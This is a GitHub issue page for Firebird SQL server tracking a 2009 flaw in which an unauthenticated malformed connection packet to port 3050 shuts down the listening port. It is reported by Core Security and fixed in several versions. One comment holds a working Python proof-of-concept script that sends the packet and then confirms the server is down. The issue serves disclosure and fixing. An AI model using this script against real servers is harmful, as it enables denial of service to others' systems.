Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Possible DoS attack using the malformed packet sent into the connection port [CORE2563] #2973

Closed
firebird-automations opened this issue Jul 20, 2009 · 11 comments

Comments

@firebird-automations
Copy link
Collaborator

Submitted by: @dyemanov

It's possible to shutdown the server's main port (3050 by default) via sending a malformed packet of some special format, thus causing a DoS condition for new incoming connections. This exploit can be used by an unauthenticated client. Reported 15-Jul-2009 by Core Security Technologies.

Commits: 0964cde 01fbf3c a095a41 d6c79a4

@firebird-automations
Copy link
Collaborator Author

Modified by: @dyemanov

assignee: Dmitry Yemanov [ dimitr ]

@firebird-automations
Copy link
Collaborator Author

Modified by: @dyemanov

status: Open [ 1 ] => In Progress [ 3 ]

@firebird-automations
Copy link
Collaborator Author

Commented by: @dyemanov

This is the restricted (developers only) comment which contains a Python script reproducing the issue.

import socket
import time

def attack(host, port):
op_connect_request = '\x35' #⁠ Request to establish connection

packet  = '\\x00\\x00\\x00' \+ op\_connect\_request
packet \+= "A" \* 12              #⁠Invalid data, must be \>= 12 bytes in order to trigger the DoS

print "\(\+\) Connecting to the server\.\.\.\."
s = socket\.socket\(socket\.AF\_INET, socket\.SOCK\_STREAM\)
s\.connect\(\(host, port\)\)
print "\(\+\) Sending op\_connect\_request packet\.\.\."
s\.send\(str\(packet\)\)
s\.close\(\)
print "\(\+\) op\_connect\_request packet successfully sent\."

#⁠Wait 10 seconds and try to connect again to Firebird SQL server, to check if it's down
print "\(\+\) Waiting 10 seconds before trying to reconnect to the server\.\.\."
time\.sleep\(10\)

try:
    print "\(\+\) Trying to reconnect\.\.\."
    s = socket\.socket\(socket\.AF\_INET, socket\.SOCK\_STREAM\)
    s\.connect\(\(host, port\)\)
    s\.close\(\)
    print "\(\!\) Something went wrong\. The server is still alive\."
except socket\.error:
    print "\(\*\) Attack successful\. The server is down\."

port = 3050
host = '127.0.0.1' #⁠Replace with your target host
attack(host, port)

@firebird-automations
Copy link
Collaborator Author

Modified by: @dyemanov

description: It's possible to shutdown the server's main port (3050 by default) via sending a malformed packet of some special format, thus causing a DoS condition for new incoming connections. This exploit can be used by an unauthenticated client. Reported 15-Jun-2009 by Core Security Technologies. => It's possible to shutdown the server's main port (3050 by default) via sending a malformed packet of some special format, thus causing a DoS condition for new incoming connections. This exploit can be used by an unauthenticated client. Reported 15-Jul-2009 by Core Security Technologies.

@firebird-automations
Copy link
Collaborator Author

Modified by: @dyemanov

status: In Progress [ 3 ] => In Progress [ 3 ]

Fix Version: 2.1.3 [ 10302 ]

Fix Version: 2.5 Beta 2 [ 10300 ]

Fix Version: 1.5.6 [ 10225 ]

Fix Version: 2.0.6 [ 10303 ]

@firebird-automations
Copy link
Collaborator Author

Modified by: @dyemanov

status: In Progress [ 3 ] => Open [ 1 ]

@firebird-automations
Copy link
Collaborator Author

Modified by: @dyemanov

security: Developers [ 10012 ] =>

@firebird-automations
Copy link
Collaborator Author

Modified by: @dyemanov

status: Open [ 1 ] => Resolved [ 5 ]

resolution: Fixed [ 1 ]

@firebird-automations
Copy link
Collaborator Author

Modified by: @pcisar

status: Resolved [ 5 ] => Closed [ 6 ]

@firebird-automations
Copy link
Collaborator Author

Modified by: @pavel-zotov

QA Status: No test

@firebird-automations
Copy link
Collaborator Author

Modified by: @pavel-zotov

status: Closed [ 6 ] => Closed [ 6 ]

QA Status: No test => Not enough information

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment